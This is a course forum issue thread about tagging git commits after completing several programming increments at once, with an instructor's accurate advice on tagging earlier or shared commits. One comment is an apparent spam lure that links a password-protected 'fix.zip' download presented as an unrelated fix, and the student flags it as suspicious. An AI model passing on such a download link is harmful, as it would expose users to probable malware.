### ISSUE TITLE
Tagging at the end Vs. Tagging incrementally

### ISSUE THREAD

**Issue by averageandyyy** [nus-cs2113-AY2425S1/forum#6]
Dear teaching team, as I was working through the iP, I decided to complete all the levels in 1 go and forgot to tag, commit and push incrementally. Can I instead commit and tag just Level 3? Otherwise, I would have to go back to "regress" my work just to execute the incremental commits, which can be quite a hassle. I understand and acknowledge that it is my fault for not reading the instructions clearly. Let me know what I can do in this situation and thank you for your help.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by averageandyyy** [comment]
I do not know who the above commenter is. I advise to not click on the suspicious link.

**Comment by okkhoy** [comment]
> as I was working through the iP, I decided to complete all the levels in 1 go

For the future increments, please follow the right process of working on increments one at a time; commit small, and commit frequently. 

> Can I instead commit and tag just Level 3?

No, you are expected to create all the tags as we use it for self-declared progress tracking

>  Otherwise, I would have to go back to "regress" my work just to execute the incremental commits

No need! as demonstrated in the lecture last week, you can tag previous commits to indicate `Level-1` and `Level-2`.
However, if you have only one commit (see the first point above, first😄) you can add the `Level-1` and `Level-2` tags to the same commit (git allows you to create multiple tags for the same commit!).

@averageandyyy

**Comment by averageandyyy** [comment]
Thank you for the reply. Painful lesson learnt!

**Comment by okkhoy** [comment]
No damage done for now. So it shouldn't be painful 😄
